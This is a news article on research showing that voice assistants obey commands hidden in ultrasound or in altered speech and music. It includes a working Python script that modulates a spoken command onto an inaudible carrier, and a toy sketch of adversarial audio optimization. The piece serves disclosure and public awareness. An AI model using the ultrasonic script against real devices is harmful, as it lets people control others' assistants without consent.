Alexa, Siri, and Google Assistant can hear silent commands that you can't

Theresa Hayes | 12 May, 2018, 06:01

In laboratory settings, researchers have been able to activate the voice assistants and issue them commands using sounds that are undetectable to the human ear, according to a new report in The New York Times.

The researchers say criminals could exploit the technique to unlock doors, wire money, or shop online, simply by hiding commands in music playing over the radio.

Of course, companies always deny that they are eavesdropping on or recording your conversations, but the fact that these devices are constantly listening for trigger words can be disconcerting for some.

Speaking to The New York Times, Nicholas Carlini, a fifth-year PhD student in computer security at UC Berkeley and one of the paper's authors, said that while such attacks haven't yet been reported in the wild, it's possible that "malicious people already employ people to do what I do".

Apple has additional security features that prevent the HomePod smart speaker from unlocking doors, and it requires users to provide extra authentication, such as unlocking their iPhone, before exposing sensitive data. Researchers have already used inaudible commands to instruct smart devices to visit malicious sites, initiate calls, take pictures, and send messages. Last year, a Burger King commercial deliberately triggered voice assistants with the line, "O.K., Google, what is the Whopper burger?" The law has yet to catch up: there is very little legislation on sending subliminal messages to humans, and none at all against sending inaudible commands to other people's machines. For its part, the Federal Communications Commission (FCC) has discouraged the practice, calling it "counter to the public interest".

Taking the research further, some of the same Berkeley researchers published a paper this month demonstrating that they could embed silent commands directly into recordings of speech and music. Ultrasonic attacks generally require the transmitter to be close to the target device, though a more powerful ultrasonic transmitter can extend the effective range. In theory, the researchers say, cybercriminals could use these inaudible commands to cause all sorts of havoc. Researchers at the University of Illinois at Urbana-Champaign showed that although the commands could not yet penetrate walls, they could still control smart devices through open windows in buildings.
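The published papers don't include attack code, but the ultrasonic technique amounts to amplitude-modulating a recorded voice command onto a carrier above the range of human hearing; a microphone's nonlinear response then demodulates it back into the audible band. Here is a minimal sketch of that modulation step, where the filename, carrier frequency, and modulation depth are all illustrative choices, not values from the research:

```python
# Sketch of ultrasonic amplitude modulation, the inaudible-carrier technique
# described above. Filenames and parameters are illustrative assumptions.
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000   # above ~20 kHz, inaudible to humans
OUT_RATE = 96_000     # must exceed 2 * (carrier + voice bandwidth)

# Hypothetical mono recording of a spoken command, e.g. "OK Google ...".
rate, voice = wavfile.read("command.wav")
voice = voice.astype(np.float64)
voice /= np.max(np.abs(voice))            # normalize to [-1, 1]

# Upsample the voice signal to the output rate by linear interpolation.
t_in = np.arange(len(voice)) / rate
t_out = np.arange(int(len(voice) * OUT_RATE / rate)) / OUT_RATE
voice_up = np.interp(t_out, t_in, voice)

# Classic AM: carrier * (1 + m * signal). The emitted sound is entirely
# ultrasonic, but a microphone's nonlinearity recovers the audible command.
m = 0.8  # modulation depth
am = np.cos(2 * np.pi * CARRIER_HZ * t_out) * (1 + m * voice_up)

wavfile.write("ultrasonic.wav", OUT_RATE,
              (am / np.max(np.abs(am)) * 32767).astype(np.int16))
```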

You can hear the audio files on Carlini's website.
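Carlini's published attack works by gradient descent against the CTC loss of Mozilla's DeepSpeech speech-to-text model; reproducing that here would require the full model, but the shape of the optimization, nudging a waveform with a small additive perturbation until the model produces the attacker's target output while a loudness budget keeps the change quiet, can be sketched with a toy stand-in network. Everything below, from `ToyModel` to the budget `eps`, is illustrative rather than the researchers' code:

```python
# Sketch of the optimization behind adversarial audio: find a small delta
# such that model(waveform + delta) yields the attacker's target output.
# ToyModel is a stand-in for a real speech-to-text model like DeepSpeech.
import torch
import torch.nn as nn

class ToyModel(nn.Module):
    """Placeholder classifier standing in for a speech-to-text model."""
    def __init__(self, n_classes=10):
        super().__init__()
        self.net = nn.Sequential(
            nn.Conv1d(1, 16, kernel_size=9, stride=4), nn.ReLU(),
            nn.AdaptiveAvgPool1d(1), nn.Flatten(), nn.Linear(16, n_classes))
    def forward(self, x):
        return self.net(x)

torch.manual_seed(0)
model = ToyModel().eval()
waveform = torch.randn(1, 1, 16_000)   # one second of "audio" at 16 kHz
target = torch.tensor([3])             # stands in for the target transcript

delta = torch.zeros_like(waveform, requires_grad=True)
opt = torch.optim.Adam([delta], lr=1e-2)
eps = 0.05                             # loudness budget for the perturbation

for step in range(200):
    opt.zero_grad()
    loss = nn.functional.cross_entropy(model(waveform + delta), target)
    loss.backward()
    opt.step()
    with torch.no_grad():
        delta.clamp_(-eps, eps)        # keep the perturbation quiet

print("target now predicted:",
      model(waveform + delta).argmax().item() == target.item())
```

The real attack swaps the cross-entropy for DeepSpeech's CTC loss over a target transcription, which is why the perturbed clips on Carlini's site sound essentially unchanged to a human listener.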

"Companies have to ensure user-friendliness of their devices, because that's their major selling point", said Tavish Vaidya, a researcher at Georgetown.

Carlini stated, "We want to demonstrate that it's possible, and then hope that other people will say, 'Okay, this is possible, now let's try and fix it.'"